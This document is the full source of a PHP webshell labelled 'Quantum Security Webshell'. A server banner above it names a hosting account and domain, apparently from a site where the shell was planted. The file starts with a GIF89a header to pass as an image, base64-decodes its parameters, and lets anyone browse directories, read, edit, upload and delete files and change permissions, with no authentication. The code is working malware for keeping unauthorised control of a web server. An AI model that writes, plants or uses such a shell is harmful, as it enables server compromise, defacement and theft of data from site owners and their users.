Server : LiteSpeed System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64 User : u615232177 ( 615232177) PHP Version : 8.1.33 Disable Function : NONE Directory : /home/u615232177/domains/adesmiley.com/public_html/ |
GIF89a;
<?php
// ===== HTML HEADER =====
echo "<!doctype html><html lang='en'><head><meta charset='utf-8'><title>Quantum Security Webshell</title></head><body>";
// ===== STYLE =====
echo '<style>
body {
background: #0a0a0a;
color: #ff1c1c;
font-family: "Courier New", monospace;
text-shadow: 0 0 5px #ff1c1c, 0 0 10px #ff0000, 0 0 20px #ff0000;
}
h3, hr { border-color: #ff1c1c; }
table {
width: 100%; border-collapse: collapse;
background: rgba(20,20,20,0.9);
box-shadow: 0 0 15px #ff1c1c;
}
td { border: 1px solid #ff1c1c; padding: 5px; }
a { color: #ff3b3b; text-decoration: none; }
a:hover {
color: #fff;
text-shadow: 0 0 5px #ff0000, 0 0 15px #ff1c1c;
}
input, textarea {
background: #1a1a1a; color: #ff1c1c;
border: 1px solid #ff1c1c;
padding: 4px; border-radius: 4px;
}
input[type=submit], input[type=button] {
cursor: pointer;
background: linear-gradient(90deg,#330000,#ff1c1c,#330000);
color: white; border: none; padding: 6px 12px;
font-weight: bold; text-transform: uppercase;
box-shadow: 0 0 10px #ff0000; transition: 0.3s;
}
input[type=submit]:hover, input[type=button]:hover {
box-shadow: 0 0 20px #ff1c1c, 0 0 30px #ff0000;
}
</style>';
?>
<?php
echo '<hr>';
$a = realpath($_SERVER['DOCUMENT_ROOT']);
function x($b){ return base64_encode($b); }
function y($b){ return base64_decode($b); }
foreach($_GET as $c=>$d) $_GET[$c] = y($d);
if(isset($_GET['d'],$_GET['f']) && !is_dir($_GET['d'].'/'.$_GET['f'])){
if(isset($_POST['t']))
echo 'FILE '.(file_put_contents($_GET['d'].'/'.$_POST['f'],$_POST['t'])?'done':'failed').' updating.';
echo $_GET['f'].
'<form method=post action="?'.$_SERVER['QUERY_STRING'].'">'.
'<input name="f" value="'.$_GET['f'].'">'.
'<textarea name="t">'.
htmlspecialchars(preg_replace('/[^(\x00-\x7f)]/','',file_get_contents($_GET['d'].'/'.$_GET['f']))).
'</textarea>'.
'<input type=submit value=update></form>';
}
if(isset($_GET['d'],$_GET['f'],$_GET['c']))
echo 'CHMOD '.(chmod($_GET['d'].'/'.$_GET['f'],octdec($_GET['c']))?'done':'failed');
if(isset($_GET['d'],$_FILES['u']))
echo 'UPLOAD '.(move_uploaded_file($_FILES['u']['tmp_name'],$_GET['d'].'/'.basename($_FILES['u']['name']))?'done':'failed');
if(isset($_GET['d'],$_GET['x']))
echo 'DELETE '.(unlink($_GET['d'].'/'.$_GET['x'])?'done':'failed');
$e = realpath(isset($_GET['d'])?$_GET['d']:$a);
chdir($e);
echo '<hr>docroot: <a href="?d='.x($a).'">'.$a.'</a><hr>curdir: '.$e.
'<form method="post" action="#" enctype="multipart/form-data">'.
'<input type="file" name="u"><input type="submit" value="UpL0ad"></form>'.
'<table border=1>';
foreach(scandir($e) as $v){
$u = realpath($v); $s = stat($u);
echo '<tr><td>'.
($s['mode']>=0x8000?'<a href="?d='.x($e).'&x='.x($v).'">X</a>':'').
'</td><td><a href="?'.
($s['mode']>=0x8000?'d='.x($e).'&f='.x($v):'d='.x($u)).'"/>'.
$v.'</a></td><td>'.
'<input type="button" onclick="c=prompt(`chmod:`,this.value),c?location.href=`?d='.x($e).'&f='.x($v).'&c=`+btoa(c):0" value="'.substr(sprintf('%o',$s['mode']),-4).'">'.
'</td><td>'.$s['size'].'</td></tr>';
}
echo '</table>';